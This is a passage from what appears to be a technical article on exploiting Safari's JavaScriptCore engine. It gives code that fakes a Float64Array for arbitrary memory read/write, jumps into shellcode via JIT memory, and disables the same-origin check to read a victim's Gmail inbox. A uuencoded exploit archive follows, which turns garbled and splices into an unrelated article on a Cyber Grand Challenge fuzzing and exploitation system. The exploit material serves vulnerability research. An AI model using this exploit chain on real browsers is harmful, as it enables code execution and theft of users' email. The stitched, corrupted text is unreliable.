read/write primitive. Clearly, the most +important part will be the structure ID in the JSCell header, as the +associated structure instance is what makes our piece of memory "look like" +a Float64Array to the engine. We thus need to know the ID of a Float64Array +structure in the structure table. + + +----[ 6.1 - Predicting structure IDs + +Unfortunately, structure IDs aren't necessarily static across different +runs as they are allocated at runtime when required. Further, the IDs of +structures created during engine startup are version dependent. As such we +don't know the structure ID of a Float64Array instance and will need to +determine it somehow. + +Another slight complication arises since we cannot use arbitrary structure +IDs. This is because there are also structures allocated for other garbage +collected cells that are not JavaScript objects (strings, symbols, regular +expression objects, even structures themselves). Calling any method +referenced by their method table will lead to a crash due to a failed +assertion. These structures are only allocated at engine startup though, +resulting in all of them having fairly low IDs. + +To overcome this problem we will make use of a simple spraying approach: we +will spray a few thousand structures that all describe Float64Array +instances, then pick a high initial ID and see if we've hit a correct one. + + for (var i = 0; i < 0x1000; i++) { + var a = new Float64Array(1); + // Add a new property to create a new Structure instance. + a[randomString()] = 1337; + } + +We can find out if we've guessed correctly by using 'instanceof'. If we did +not, we simply use the next structure. + + while (!(fakearray instanceof Float64Array)) { + // Increment structure ID by one here + } + +Instanceof is a fairly safe operation as it will only fetch the structure, +fetch the prototype from that and do a pointer comparison with the given +prototype object. + + +----[ 6.2 - Putting things together: faking a Float64Array + +Float64Arrays are implemented by the native JSArrayBufferView class. In +addition to the standard JSObject fields, this class also contains the +pointer to the backing memory (we'll refer to it as 'vector', similar to +the source code), as well as a length and mode field (both 32-bit +integers). + +Since we place our Float64Array inside the inline slots of another object +(referred to as 'container' from now on), we'll have to deal with some +restrictions that arise due to the JSValue encoding. Specifically we + + * cannot set a nullptr butterfly pointer since null isn't a valid + JSValue. This is fine for now as the butterfly won't be accessed for + simple element access operations + + * cannot set a valid mode field since it has to be larger than + 0x00010000 due to the NaN-boxing. We can freely control the length + field though + + * can only set the vector to point to another JSObject since these are + the only pointers that a JSValue can contain + +Due to the last constraint we'll set up the Float64Array's vector to point +to a Uint8Array instance: + ++----------------+ +----------------+ +| Float64Array | +------------->| Uint8Array | +| | | | | +| JSCell | | | JSCell | +| butterfly | | | butterfly | +| vector ------+---+ | vector | +| length | | length | +| mode | | mode | ++----------------+ +----------------+ + +With this we can now set the data pointer of the second array to an +arbitrary address, providing us with an arbitrary memory read/write. + +Below is the code for creating a fake Float64Array instance using our +previous exploit primitives. The attached exploit code then creates a +global 'memory' object which provides convenient methods to read from and +write to arbitrary memory regions. + + sprayFloat64ArrayStructures(); + + // Create the array that will be used to + // read and write arbitrary memory addresses. + var hax = new Uint8Array(0x1000); + + var jsCellHeader = new Int64([ + 00, 0x10, 00, 00, // m_structureID, current guess + 0x0, // m_indexingType + 0x27, // m_type, Float64Array + 0x18, // m_flags, OverridesGetOwnPropertySlot | + // InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero + 0x1 // m_cellState, NewWhite + ]); + + var container = { + jsCellHeader: jsCellHeader.encodeAsJSVal(), + butterfly: false, // Some arbitrary value + vector: hax, + lengthAndFlags: (new Int64('0x0001000000000010')).asJSValue() + }; + + // Create the fake Float64Array. + var address = Add(addrof(container), 16); + var fakearray = fakeobj(address); + + // Find the correct structure ID. + while (!(fakearray instanceof Float64Array)) { + jsCellHeader.assignAdd(jsCellHeader, Int64.One); + container.jsCellHeader = jsCellHeader.encodeAsJSVal(); + } + + // All done, fakearray now points onto the hax array + +To "visualize" the result, here is some lldb output. The container object +is located at 0x11321e1a0: + + (lldb) x/6gx 0x11321e1a0 + 0x11321e1a0: 0x0100150000001138 0x0000000000000000 + 0x11321e1b0: 0x0118270000001000 0x0000000000000006 + 0x11321e1c0: 0x0000000113217360 0x0001000000000010 + (lldb) p *(JSC::JSArrayBufferView*)(0x11321e1a0 + 0x10) + (JSC::JSArrayBufferView) $0 = { + JSC::JSNonFinalObject = { + JSC::JSObject = { + JSC::JSCell = { + m_structureID = 4096 + m_indexingType = '\0' + m_type = Float64ArrayType + m_flags = '\x18' + m_cellState = NewWhite + } + m_butterfly = { + JSC::CopyBarrierBase = (m_value = 0x0000000000000006) + } + } + } + m_vector = { + JSC::CopyBarrierBase = (m_value = 0x0000000113217360) + } + m_length = 16 + m_mode = 65536 + } + +Note that m_butterfly as well as m_mode are invalid as we cannot write null +there. This causes no trouble for now but will be problematic once a garbage +collection run occurs. We'll deal with this later. + + +----[ 6.3 - Executing shellcode + +One nice thing about JavaScript engines is the fact that all of them make +use of JIT compiling. This requires writing instructions into a page in +memory and later executing them. For that reasons most engines, including +JSC, allocate memory regions that are both writable and executable. This is +a good target for our exploit. We will use our memory read/write primitive +to leak a pointer into the JIT compiled code for a JavaScript function, +then write our shellcode there and call the function, resulting in our own +code being executed. + +The attached PoC exploit implements this. Below is the relevant part of the +runShellcode function. + + // This simply creates a function and calls it multiple times to + // trigger JIT compilation. + var func = makeJITCompiledFunction(); + var funcAddr = addrof(func); + print("[+] Shellcode function object @ " + funcAddr); + + var executableAddr = memory.readInt64(Add(funcAddr, 24)); + print("[+] Executable instance @ " + executableAddr); + + var jitCodeAddr = memory.readInt64(Add(executableAddr, 16)); + print("[+] JITCode instance @ " + jitCodeAddr); + + var codeAddr = memory.readInt64(Add(jitCodeAddr, 32)); + print("[+] RWX memory @ " + codeAddr.toString()); + + print("[+] Writing shellcode..."); + memory.write(codeAddr, shellcode); + + print("[!] Jumping into shellcode..."); + func(); + +As can be seen, the PoC code performs the pointer leaking by reading a +couple of pointers from fixed offsets into a set of objects, starting from +a JavaScript function object. This isn't great (since offsets can change +between versions), but suffices for demonstration purposes. As a first +improvement, one should try to detect valid pointers using some simple +heuristics (highest bits all zero, "close" to other known memory regions, +...). Next, it might be possible to detect some objects based on unique +memory patterns. For example, all classes inheriting from JSCell (such as +ExecutableBase) will start with a recognizable header. Also, the JIT +compiled code itself will likely start with a known function prologue. + +Note that starting with iOS 10, JSC no longer allocates a single RWX region +but rather uses two virtual mappings to the same physical memory region, +one of them executable and the other one writable. A special version of +memcpy is then emitted at runtime which contains the (random) address of +the writable region as immediate value and is mapped --X, preventing an +attacker from reading the address. To bypass this, a short ROP chain would +now be required to call this memcpy before jumping into the executable +mapping. + + +----[ 6.4 - Staying alive past garbage collection + +If we wanted to keep our renderer process alive past our initial exploit +(we'll later see why we might want that), we are currently faced with an +immediate crash once the garbage collector kicks in. This happens mainly +because the butterfly of our faked Float64Array is an invalid pointer, but +not null, and will thus be accessed during GC. From +JSObject::visitChildren: + + Butterfly* butterfly = thisObject->m_butterfly.get(); + if (butterfly) + thisObject->visitButterfly(visitor, butterfly, + thisObject->structure(visitor.vm())); + +We could set the butterfly pointer of our fake array to nullptr, but this +would lead to another crash since that value is also a property of our +container object and would be treated as a JSObject pointer. We will thus +do the following: + + 1. Create an empty object. The structure of this object will describe + an object with the default amount of inline storage (6 slots), but + none of them being used. + + 2. Copy the JSCell header (containing the structure ID) to the + container object. We've now caused the engine to "forget" about the + properties of the container object that make up our fake array. + + 3. Set the butterfly pointer of the fake array to nullptr, and, while + we're at it also replace the JSCell of that object with one from a + default Float64Array instance + +The last step is required since we might end up with the structure of a +Float64Array with some property due to our structure spraying before. + +These three steps give us a stable exploit. + +On a final note, when overwriting the code of a JIT compiled function, care +must be taken to return a valid JSValue (if process continuation is +desired). Failing to do so will likely result in a crash during the +next GC, as the returned value will be kept by the engine and inspected by +the collector. + +----[ 6.5 - Summary + +At this point it is time for a quick summary of the full exploit: + + 1. Spray Float64Array structures + + 2. Allocate a container object with inline properties that together + build up a Float64Array instance in its inline property slots. Use a + high initial structure ID which will likely be correct due to the + previous spray. Set the data pointer of the array to point to a + Uint8Array instance. + + 3. Leak the address of the container object and create a fake object + pointing to the Float64Array inside the container object + + 4. See if the structure ID guess was correct using 'instanceof'. If not + increase the structure ID by assigning a new value to the + corresponding property of the container object. Repeat until we have + a Float64Array. + + 5. Read from and write to arbitrary memory addresses by writing the + data pointer of the Uint8Array + + 6. With that repair the container and the Float64Array instance to + avoid crashing during garbage collection + +--[ 7 - Abusing the renderer process + +Usually, from here the next logical step would be to fire up a sandbox +escape exploit of some sort for further compromise of the target machine. + +Since discussion of these is out of scope for this article, and due to good +coverage of those in other places, let us instead explore our current +situation. + + +----[ 7.1 - WebKit process and privilege model + +Since WebKit 2 [22] (circa 2011), WebKit features a multi-process model in +which a new renderer process is spawned for every tab. Besides stability +and performance reasons, this also provides the basis for a sandboxing +infrastructure to limit the damage that a compromised renderer process can +do to the system. + + +----[ 7.2 - The same-origin policy + +The same-origin policy (SOP) provides the basis for (client-side) web +security. It prevents content originating from origin A from interfering +with content originating from another origin B. This includes script level +access (e.g. accessing DOM objects inside another window) as well as +network level access (e.g. XMLHttpRequests). Interestingly, in WebKit the +SOP is enforced inside the renderer processes, which means we can bypass it +at this point. The same is currently true for all major web browsers, but +chrome is about to change this with their site-isolation project [23]. + +This fact is nothing new and has even been exploited in the past, but it is +worth discussing. In essence, this means that a renderer process has full +access to all browser sessions and can send authenticated cross-origin +requests and read the response. An attacker who compromises a renderer +process thus obtains access to all the browser sessions of the victim. + +For demonstration purposes we will now modify our exploit to display the +users gmail inbox. + + +----[ 7.3 - Stealing emails + +There is an interesting field inside the SecurityOrigin class in WebKit: +m_universalAccess. If set, it will cause all cross-origin checks to +succeed. We can obtain a reference to the currently active SecurityDomain +instance by following a set of pointers (whose offsets are again dependent +on the current Safari version). We can then enable universalAccess for our +renderer process and can subsequently perform authenticated cross-origin +XMLHttpRequests. Reading emails from gmail then becomes as simple as + + var xhr = new XMLHttpRequest(); + xhr.open('GET', 'https://mail.google.com/mail/u/0/#inbox', false); + xhr.send(); // xhr.responseText now contains the full response + +Included is a version of the exploit that does this and displays the +"users" current gmail inbox. For reasons that should be clear by now this +does require a valid gmail session in Safari ;) + + +--[ 8 - References + +[1] http://www.zerodayinitiative.com/advisories/ZDI-16-485/ +[2] https://webkit.org/blog/3362/introducing-the-webkit-ftl-jit/ +[3] http://trac.webkit.org/wiki/JavaScriptCore +[4] http://www.ecma-international.org/ +ecma-262/6.0/#sec-ecmascript-data-types-and-values +[5] http://www.ecma-international.org/ecma-262/6.0/#sec-objects +[6] https://en.wikipedia.org/wiki/Double-precision_floating-point_format +[7] http://www.ecma-international.org/ +ecma-262/6.0/#sec-array-exotic-objects +[8] http://www.ecma-international.org/ +ecma-262/6.0/#sec-ecmascript-standard-built-in-objects +[9] https://developer.mozilla.org/en-US/docs/Web/JavaScript/ +Reference/Global_Objects/Array/slice). +[10] https://github.com/WebKit/webkit/ +blob/320b1fc3f6f47a31b6ccb4578bcea56c32c9e10b/Source/JavaScriptCore/runtime +/ArrayPrototype.cpp#L848 +[11] https://developer.mozilla.org/en-US/docs/Web/ +JavaScript/Reference/Global_Objects/Symbol/species +[12] http://www.ecma-international.org/ecma-262/6.0/#sec-type-conversion +[13] https://bugzilla.mozilla.org/show_bug.cgi?id=735104 +[14] https://bugzilla.mozilla.org/show_bug.cgi?id=983344 +[15] https://bugs.chromium.org/p/chromium/issues/detail?id=554946 +[16] https://www.gnu.org/software/guile/manual/html_node/ +Conservative-GC.html +[17] http://www.ecma-international.org/ +ecma-262/6.0/#sec-ecmascript-language-types-number-type +[18] http://www.ecma-international.org/ecma-262/6.0/#sec-typedarray-objects +[19] https://developers.google.com/v8/design#fast-property-access +[20] http://www.ecma-international.org/ +ecma-262/6.0/#sec-operations-on-objects +[21] http://www.ecma-international.org/ecma-262/6.0/ +#sec-ordinary-object-internal-methods-and-internal-slots-delete-p +[22] https://trac.webkit.org/wiki/WebKit2 +[23] https://www.chromium.org/developers/design-documents/site-isolation + + +--[ 9 - Source code + +begin 644 src.zip +M4$L#!`H``````%&N1DD````````````````$`!P``L``03U`0``!%````!02P,$%`````@`%ZY&2;A,.B1W`P``)@D```X` +M'`!S`L``03U`0``!%````"- +M5E%OVS80?L^ON'H/DE9;2H:B*&([F)%D78:U*9H@;9$%`2V=;082J9)4;*'M +M?]^1LA39L=7J11)Y]]WW'7E'CEZ<79Y>?_EP#@N3I2<'H_J%+#DY`!AI4Z9H +MOP"F,BGAF_L$F$EA!C.6\;0\ADP*J7,6X]#-_K".T=K3@<2*YP:TBL>]PO!4 +MAP^Z=T(F;OQDVX0+\_I5MTF^%%L&3Q85VUDA8L.E@%P1GI_I>="0!TAD7&0H +M3&A%A5P(5->X,O!R#&0)+\'[3WBU&O>*(CCCFDU3U&`6")IE.)"*SSF%D"F/ +M2\J)HBFN0:%(4*&BV#)&K8&)!'0QU?BUH*!I62/.T,0+K.83KO.4E15ZH5%I +MF&>,I\#%5*Z`SX"M!S1!6F6XXMKH<%.N@WQ'9GY;+WG[+[B^*5)2:D7X07O: +M/E6>>K>#._CGZA0>B8#%$]+`8^,6PF0JE>%BW@N&&^X*3:'$T]@Z;6NA5S2; +M.V499E*59,Z2:*FX01LXXX8_8MAXT/+ZA-_\/S(%#WJU4#`&@4OX_.[?OXW) +M/]I\:K/;=)(DUIS12\Y\-]2B7*O]W:K=A*.$:\-$C/`G]&@K-&BAD5>&_.:4 +MO*V(3_$J?:'5=V'WL4_C?@/1A\/5'X?!;B+=-'Y.HMK^YRN,3ZDZ:3MW46H1 +M>KV/T%4#6-B]M4;=)K8S;!=-@J.%+R]=\7QPM=/%=">^Y7VTE_>.",]8[V'Q +MR\0[*>\![\.;7Z+<3;:#IBTU:>M,H:>K9C25,D4F(&9IB@ED]X7@MKA9.HEM +M^]/;_V^N`M +MJ`#T<1391A?.I9Q3SXEEYOZC(CJ,?G/MD$QG+-782F8%IJGU/NL'"G4NA49: +MKLJJ'K`]?[BYQH8IT7&M1D=$#1P.?,]:W)SJ]E=U>`L` +M`03U`0``!%````"]5_UNVS80_]]/<0NP6D)MQ0F"+&B:`5G;#=NP#*B[%5C1 +M`;1$V6QDTB,IQ\::O9B^V.U*2J8^F'5#,"!";.M['[SY^I^/CT?$QO!)R +M#VN5E04'NV(6-EIM1<8-+,02HO.SA;`Q"&GYDFN3X!6Z]4QM]EHL5Q:B-(;3 +MVH)3H-=!^4%%PN[0J^A%.XNH*381WC&3F]K<)OGA!48OG"PW^%J*[X +MKA#Y/MI.X*)CS6&:&&XC!V:2:[6.FMMQHOD6RX%'>YNRV"XI:O..I'0(% +MRP)AD2GEQ>4^S$W?EVWBOO>LW@,OT%#_:@NT+ZXPS)X(?>Q*JSMXA?7Q0FM, +M\I&OV75I+*S8%FMVE[+4%GNX0$M\C9UADJ..$QU7NRY^'"8J\UQ(GG60Z@BC +M$"L+VY;I1>#0A%0AOKI,L2>QJ:O.Q^PSO2PIBB:(^U'=<"^Y+35*0*;*!;;K +MW0HKUC6Y8>MV+^)@:"8%H_[U/6E7PB3,//?WKZ#N[BA,+@VL%4]O(4?7;MA- +M\X!2YF!\\]5;JO'9+L_AT:/Z\/QP^/X]=,YXIZD\*C077C*Y#*!QPRI%(*2R +ML."','!R+?9-\$=QT$/:`S-W>":EW+#T-JI^X6Q@B/?$.U1C>MD']1W;,I-J +ML;'8CT6)\/Y7=-U,Q#F+?TIB16Z4,8*`)B#K.4WCEI1J"AO>S':SV>QD%GPF +M#L(\#\_B6G]6.A:H"@!KB'J=QK,O)R:H_,-4_S#_U07S@5Q32MLYI82VIPNUPS1,4.P9L"PS`CT1=[1`UV?9`Z'%IX.,W +MS(@4L<8AL>96I,$(P%INS&(Z7`GXGN<&Z<%'0]V[WI1^?E#QXI'0,";_Q^!Y +M.6FL/>>ITHRX@F:)9Y":H$%MN'9J3`*OV"TF.V6:UU?1FI\3E@"IZ<60R;8> +M0].@HJ+,A]-L?XV)*)^`1"5F`,Y!J.LITQ@..-\KZE&U'QS5O+C!&<&E*I>K +MP'<"H?'M"%.8)Q*'=(?822JB]A58![-+_/<4NF[@Z>/'?1?(XR\./F.1]O>A +MX86E=<=OOGYU#A]T'*WQ2]AF4^RK4='(!\+WW97`=<453"7NT'<*)QX5E5^# +MXI`&J`1O./5#D,D:0,F7D0QS-@31BA[5VOO^`1Y=#CZG4_JQ:-9.2+F#BC +MOU1G-3[AJW"U-@RN$%G5"54LA]E1AQGFGE!_0V(C6&N=J[8AX[1;VTF!F_8YAZM3^QK5JS7%:VIK1U7KB +MII?;`)A%*#$1#N_#C@!W',71!K44WVT*)1PIO^:+'X5-$G@2C_X%4$L#!!0` +M```(``^N1DF4@XGQ3`,``%`(```,`!P`=B._W#FX?AY/>/$L)7"*TK("2TX.B//"JB28=.!QYY'%*0 +M!G#.X>[;Y-A342Q"[H.G?$XIT8J-9J]F +M3NE(M"SG\L+4=$;LC5-EAGEA;O-Y9UO*Q@"9GG%T5MN`DA!6=1D5VCRYMTI[ +M:4-`UA#,>G;K?)159\$T"+B";H^&/IQTN_:IU=K%G>L2S4_)&=F2-Z8 +M0'':B1&/E%Z3%?,[2RV0VY)$`JE!2[FTM1QBK7KXKI:I/6=F#3'3>%E=!3AQ +MX9ZS-^K^6%&)N094]*?,"/5;D?&ZY6EN:;T7MO2K@*^XEZ!MB%QUW>[,A:PD%61OU_0^H*]]7Y,%HT$%CIVI@(H&;[W` +M9K>4K::FK]Q#^`(-.E\*7]5,6XXR[IPIB]ZU-?MFST6'YIW"N@VGY\W=`D9E +M`H4TR.R1D5'7*;8%O`HME7KNM6#Z)<5;I['&\CI3P2=[@] +MI$PDU%KD-NWM?;YM58N>R[>PS&\OR^8-^)WLUZ-N+ +MT_XMQNS%X1]02P,$%`````@`)*Y&2>G85Y(7"@``Z!H```H`'`!S-E +M3H>K6B]D+@SC;#`7Z'XX)A=\GDC%'M=ZW__ +M*YQZ+WYK)"ZRQDIETB_&Z9"E/3["!SKD9=6BS2\T*J&=*+*`S7.96ZC*2<(*?^5=9SIB>]BZ06'Q^PQ?\,JME +M90,XWCC"DD^DDG9%P&1`!H#HIF9Z6;(I_RIVW$SO>6]M4Y=>@E=&>N@CV5UN +MWV.Z9L;6,#"]-VW*S)E/5_4T\2>&[/L]AM>"UXCF4W9U?>H^3W$SH2\EOAR? +MXNT).QC3'WM[0W>"7CRM&E,DDNVQ<7KPZ-%/P]/V)P9[G]4U1X0;8XD-9.JJ +M$O[;3](6+W0S48"K,V`"73PU2F8B&8_8]P57C;B8GK#6]@3FXH02Y0V1I;'$#KM0)=;ENG2 +M(D&(\&\N+SRTE0;-1$TQ[",0PN*8]:&0N*"47AI$F4]MX,D=(09KG:"/;Z-8 +MT5G\GI#<[5#][Y'Z?AM%Z,>B=`;?Y:S130@4F4)QPEO*30!S'>L_%$,2N!E! +MA*B-T%DALJ],>KKCKBP%`[Z+1I6BYK`A0DV:C]W720M;$'Q?FG?\71*2`'A$ +M3G1T^-50K$A3G^M(6KT0(WP+M9TJ(Q"YID)F;]R+4 +M3.D)5UN%U/..>TZ$6MH54J)Q5$WQ=:\\JJ2=E=6R3&+ZH"8T1+DHWSN'*L3] +MTOW>0$YW+9#E`ZSI?CU_\8$@=F:&%&&%1DJS!%8;T7U)/L@R%S=MO2K%C847 +M0C"CM!W%&E!.9IBR2UEFE*.B)F6-R@DJ +MSB#391HI$"4*(*I,I")89)WQ5'F=TUT*&#T72X)?\7J&B+4W.XQJ0*_GEZZP +MK@$4\>PMMT7J#R;#U.IP^M'Q,*U%I3C28__J'_SAM^N]_=F(#0;#U#03!(:R +MYL\AG^AUV^O?D>GC&^1Z2/8-0]HZ48HE>Z4T1_US29T<1-+;&I"C.[N3Z.V5 +MJ-=ZD_^ABSK@,Y8#]W1-"K]:A^4:JJDEK.L*S//5B/?%B`(O1.7BTFOJ^J9R +MJ;,.R:VO1X&4@)02'V:WWXY3=M8Z$`C1\]J!&:/2>67:^P>@%V)9$0FI9&^> +MQ@2$'-1$OF#H@(JXHLH44)24A4$<7F1GSBWO>H=[ITN4P>Q7O#]VXKM+ARW% +ME[BIRX%E7TN]="AENJZI4)@.K?,7;@S9[=8HL@/"II1EF(8:5^D&[2D]'72Z +M'Z7L$S(5Z@J^$.L5CJK0WD9I8Z:UE-*^ULJ9&?L;F4"&EKL\/O):A:]V4WG# +M?`0$>0U;#=+3-UQ8PV>D3"G@@'`N'4!HM:8(M5MGKAFWLA%.D@8R#-SD9'Z$ +M#MZRK;)XVDD-)'-3F;OJ2O=2*K55MW]L`&Z3M^`W(7U[G!*?\-OJ_501AA,O +M`Y$I;?+@ZD_7Y+D;/^!]J,D=:1^TLDCE%W,FE/HK;!5UT.T&I^2J2[XQZA,9 +M,?)_X=\N@^>?3=\:1BQKP-#2LEGCHL!^YP4!;R[/W,24<4IZ:JX[PE3J\F'K +M*#K-RQN1-:Z4FQ%0GC6HVC2O$YI4K$,-&;$T38<_8D3>4`EX375+V;*&E +MF]O1T28K5LG,C?S<+PBR!/O1P,]?]"Z.;SI8-J7//[M&"`$?,&:-V#M=BNC> +MX4^[+KI[UIU?(VF2:V&(]."`4N`2MTBS44>^7$ZGPL6`@-.*HKH0->%BAI'6 +M@\=W:ITJ/@-X%[A6T\[W6MB+9?E+Z!*75%C_21P1=28JN^/GYZMS<,I+S$]D5XB>6G`AGD+E['W.V)_33JA#&C +M3]8^8?![<_F1QM-DV$\@DX8@G*H5)E:NC(CH?8FY($I<-]D":S$`V%2HW&1( +MUJ$H>PH;G#"$`\8:%6L#15OU*ELA4I*QLE*IL +M/6SE)P<^RNW4#&724J +M!*_:,NG\H/%WU(\(2XZ$I[6TEK,9\'M]ENY,![#)R%E)1(B_'H5=^:(4T:#8 +M<23=Z!%WI=3IQI#VEJ]HMG8@DY6.7ZBRS73J'$A3=O++%O-B,-@/Z^D\H^?B&:^&B_9M4CT+M +MV=P96NB?7+/WN$5MCA`.R_H>/DQ6M+:Z!;0M`QOK1$?NJ\/KNQX4=&4QVE'\ +M?!/LVA"Y8_/Q!S<><[0O?B5)-ZHM_EB7U3ZCB#:LT;TUK!S]-P"[8\OK"S85 +M_Y1N!WP=Z79I<-39"@?QYZY@_'S-/N%2&PPZFFY%!/G^?XC'+J`C?7>@[6'& +M#3JZ!OB6X[NP'5%=OP-@!ZN[V1]-GF +M7Y[:60&XS:F]81=26G\-CQU*)N85EF`=C=.0^GS%G_1[0EEJ?VSW+T+K=^2'1[31* +M_PBQC?;N9<7K@ZY6,4ZTHCSO6G#23I)MMVT?/6'"EL91O[0 +MVOK?_&KOQQ/)+M\ZE\. +MTVU'HCDL=N;P"/^Y#8.*.L?0_6SCRUVT>F6@? +MD$E)3@T',)I-/#U#7PN:DDQI0QMA0+1#+HVW@.YO +M>J[['U!+`P04````"`"Z;D9)MPF8]%<#``!?"```#``<`'-R8R]U=&ELJ]E=U>`L``03U`0``!%````"E5>%NVS80_N^GN!88+,.> +M[#A#$,3S@+9PBP)=,33I@"$+"EJB(JX4*9"4,Z'(L^QA^F*](R6+2A,,V/1' +MPMW'.WX?OZ.6R\ER"1^=D,*U4#0J&6*\>H*.C"(V[%@2O8MXZG +MD[XA+4OV,_@R`7Q,*)=,5U.8PSYU^M(9H6Z3D[/9++7-WCJ3_+B>;2;W_Z<] +M,&-8.]Z$%$6;4-+VFSDP@Y4L;.'Z9N,CA3:04%A@<+7!U\^^GDTE5[>NQ,A\ +M/O/0P,:F=6/+Q',DW+6XF>'F8ZX$^DL+E4RGC]':"\5,"SES;*#%)XH#ZWZ*)0[?T%:/VBU!#K#IR0=82DTWR+^N*M.R>7Z +M!I?4S%C^5KF^0><1L<`5"T#;C-7V:[W,\=GG354G)'$LCD/*Z!P*IR__N-I= +M?OIM]^'3[MWNU]W[*WB&2DT;E?-"*)Y/A]WYD]J"9YT61E>A<*20Q!7_YBK? +M=20`4NDVU]?)RD9]QB4>:Z7(.-$6^G!RWLG03\CO`@%'9#0GH4R$;C!WN@[X`7VZ?@)>2,W< +MV4\>'^"O0^0!/CZ-P5;$[N+X,_`CL,"RLN&Q^?I>A]"$4)L^3H?(\=KB4M^- +M%R#X>D4CZ^MM1LEN(X]JX=U&/;Z?PLB`]XO)\3N#_42W +MT4)ZPOWXX%ZD:O[_IT3;G!@$.R<]E%;+`Q0````(`!>N1DFX3#HD=P,``"8)```.`!@` +M``````$```"D@3X```!S`Q0````(`/1N1DD56OBT%@8``&@2```,`!@```````$` +M``"D@?T#``!S`L``03U`0``!%````!0 +M2P$"'@,4````"``/KD9)E(.)\4P#``!0"```#``8```````!````I(%9"@`` +MG85Y(7"@``Z!H```H`&````````0```*2!ZPT``'-R8R]P=VXN +M:G-55`4``[.J]E=U>`L``03U`0``!%````!02P$"'@,4````"`"Z;D9)MPF8 +M]%<#``!?"```#``8```````!````I(%&&``` + AFL + | + | + + + + | + | + Symbolic + + Genetic + | + | + Tracing + <===== + Fuzzing + | + | ++++++++++++++ ++++++++++++++ | + | | + ----------------------------------------- + + + +There are a few things we considered when we thought about how we wanted to +find bugs in the Cyber Grand Challenge. Firstly, we will need to craft +exploits using the bugs we find. As a result, we need to use techniques +which generate inputs that trigger the bugs, not just point out that there +could be a bug. Secondly, the bugs might be guarded by specific checks such +as matching a command argument, password or checksum. Lastly, the programs +which we need to analyze might be large, so we need techniques which scale +well. + +The automated bug finding techniques can be divided into three groups: +static analysis, fuzzing, and symbolic execution. Static analysis is not +too useful as it doesn't generate inputs which actually trigger the bug. +Symbolic execution is great for generating inputs which pass difficult +checks, however, it scales poorly in large programs. Fuzzing can handle +fairly large programs, but struggles to get past difficult checks. The +solution we came up with is to combine fuzzing and symbolic execution, +into a state-of-the-art guided fuzzer, called Driller. Driller uses a +mutational fuzzer to exercise components within the binary, and then uses +symbolic execution to find inputs which can reach a different component. + +* Fuzzing + +Driller leverages a popular off-the-shelf fuzzer, American Fuzzy Lop. AFL +uses instrumentation to identify the transitions that a particular input +exercises when it is passed to the program. These transitions are tuples +of source and destination basic blocks in the control flow graph. New +transition tuples often represent functionality, or code paths, that has +not been exercised before; logically, these inputs containing new +transition tuples are prioritized by the fuzzer. + +To facilitate the instrumentation, we use a fork of QEMU, which enables the +execution of DECREE binaries. Some minor modifications were made to the +fuzzer and to the emulation of DECREE binaries to enable faster fuzzing as +well as finding deeper bugs: + +- De-randomization + Randomization by the program interferes with the fuzzer's evaluation + of inputs - an input that hits an interesting transition with one + random seed, may not hit it with a different random seed. Removing + randomness allows the fuzzer to explore sections of the program which + may be guarded by randomness such as "challenge-response" exchanges. + During fuzzing, we ensure that the flag page is initialized with a + constant seed, and the random system call always returns constant + values so there is no randomness in the system. The Exploitation + component of our CRS, is responsible for handling the removal of + randomness. + +- Double Receive Failure + The system call receive fails after the input has been completely read + in by the program and the file descriptor is now closed. Any binary + which does not check the error codes for this failure may enter an + infinite loop, which slows down the fuzzer dramatically. To prevent + this behavior, if the receive system call fails twice because the + end-of-file has been reached, the program is terminated immediately. + +- At-Receive Fork Server + AFL employs a fork server, which forks the program for each execution + of an input to speed up fuzzing by avoiding costly system calls and + initialization. Given that the binary has been de-randomized as + described above, all executions of it must be identical up until the + first call to receive, which is the first point in which non-constant + data may enter the system. This allows the fork-server to be moved + from the entry of the program, to right before the first call to + receive. If there is any costly initialization of globals and data + structures, this modification speeds up the fuzzing process greatly. + +* Network Seeds + +Network traffic can contain valuable seeds which can be given to the +fuzzer to greatly increase the fuzzing effectiveness. Functionality tests +exercise deep functionality within the program and network traffic from +exploits may exercise the particular functionality which is buggy. To +generate seeds from the traffic, each input to the program is run with the +instrumentation from QEMU to identify if it hits any transitions which +have not been found before. If this condition is met, the input is +considered interesting and is added as a seed for the fuzzer. + +* Adding Symbolic Execution + +Although symbolic execution is slow and costly, it is extremely powerful. +Symbolic execution uses a constraint solver to generate specific inputs +which will exercise a given path in the binary. As such, it can produce +the inputs which pass a difficult check such as a password, a magic +number, or even a checksum. However, an approach based entirely on +symbolic execution will quickly succumb to path explosion, as the number +of paths through the binary exponentially increases with each branch. + +Driller mitigates the path-explosion problem by only tracing the paths +which the fuzzer, AFL, finds interesting. This set of paths is often small +enough that tracing the inputs in it is feasible within the time +constraints of the competition. During each symbolic trace, Driller +attempts to identify transitions that have not yet been exercised by the +fuzzer, and, if possible, it generates an input which will deviate from +the trace and take a new transition instead. These new inputs are fed back +into the fuzzer, where they will be further mutated to continue exercising +deeper paths, following the new transitions. + +* Symbolic Tracing + +To ensure that the symbolic trace using angr's concolic execution engine +is identical to the native execution trace, we use pre-constraining. In +pre-constrained execution, each byte of input is constrained to match the +original byte of input that was used by the fuzzer. When a branch is +reached that would lead to a new transition, the pre-constraints are +removed and then the solver is queried for an input which reaches the new +transition. Pre-constraining also has the benefit of greatly improving +execution time, because one does not need to perform expensive solves to +determine the locations of reads and writes to memory because all +variables have only one possible value. + + + + + +--[ 003 - The Exploiting Component + + + Crashes Inputs + || || + || || + ======================== || + || || || + || || || + \/ \/ \/ + -------------------- -------------------- -------------------- + | REX | | PovFuzzer | | Colorguard | + | | | | | | + | ++++++++++++++ | | ++++++++++++++ | | ++++++++++++++ | + | + Advanced + | | + Fuzzing + | | + Finding + | + | + AEG + | | + For + | | + Leaks + | + | + + | | + Exploits + | | + + | + | ++++++++++++++ | | ++++++++++++++ | | ++++++++++++++ | + | | | | | | + | ... | | | | | + -------------------- -------------------- -------------------- + || || || + ================================================ + || + \/ + POVs + + +* Exploitation + +In the Cyber Grand Challenge, stealing flags is a little different than +it is in ordinary Capture the Flag games. Instead of reading a secret +"flag" file and submitting the contents to the organizers, an exploit is +demonstrated by submitting a Proof of Vulnerability (POV), which the +organizers will run. + +A POV is a binary program, which will communicate with the opponent's +binary and "exploit" it. There are two ways in which a POV can be +considered successful: +- Type 1: Cause a segmentation fault where the instruction pointer and one + additional register have values which were previously negotiated + with the competition infrastructure. Must control at least + 20 bits of EIP as well as 20 bits of another register. +- Type 2: Read 4 contiguous bytes from the secret flag data. The flag data + is located at 0x4347c000-0x4347cfff and is randomly initialized + by the kernel. + +Different types of vulnerabilities might lend themselves to a specific +type of POV. For example, a vulnerability where the user can control the +address passed to puts() might only be 